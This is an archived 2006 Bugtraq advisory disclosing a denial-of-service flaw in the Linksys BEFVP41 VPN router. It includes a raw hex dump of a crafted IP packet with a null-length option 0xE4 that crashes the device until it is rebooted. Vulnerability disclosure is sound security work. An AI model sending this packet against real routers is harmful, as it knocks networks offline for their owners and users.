lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060113061745.24061.qmail@securityfocus.com>
Date: 13 Jan 2006 06:17:45 -0000
From: paul14075@...il.com
To: bugtraq@...urityfocus.com
Subject: Linksys VPN Router (BEFVP41) DoS Vulnerability


Linksys BEFVP41 (possibly others) (not sure which firmware) can be instantenously crashed by sending a specially crafted IP packet with a null length for IP option #0xE4 , like this one:

00 0f 66 99 a3 45 00 10 5a cc 59 84 08 00 46 00  
00 2c 04 d2 00 00 ff aa 06 2a c0 a8 01 65 43 08  
c6 15 e4 00 00 00 41 42 43 44 45 46 47 48 49 4a  
4b 4c 4d 4e 4f 50 52 53 54 55

I tried from within LAN-side of the router.  Did not test WAN-side, but probably still works.  Requires a reboot to fix.  Found it accidentally while doing nessus scan.  (Nessus Referenced BID : 7175, 14536)                  



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ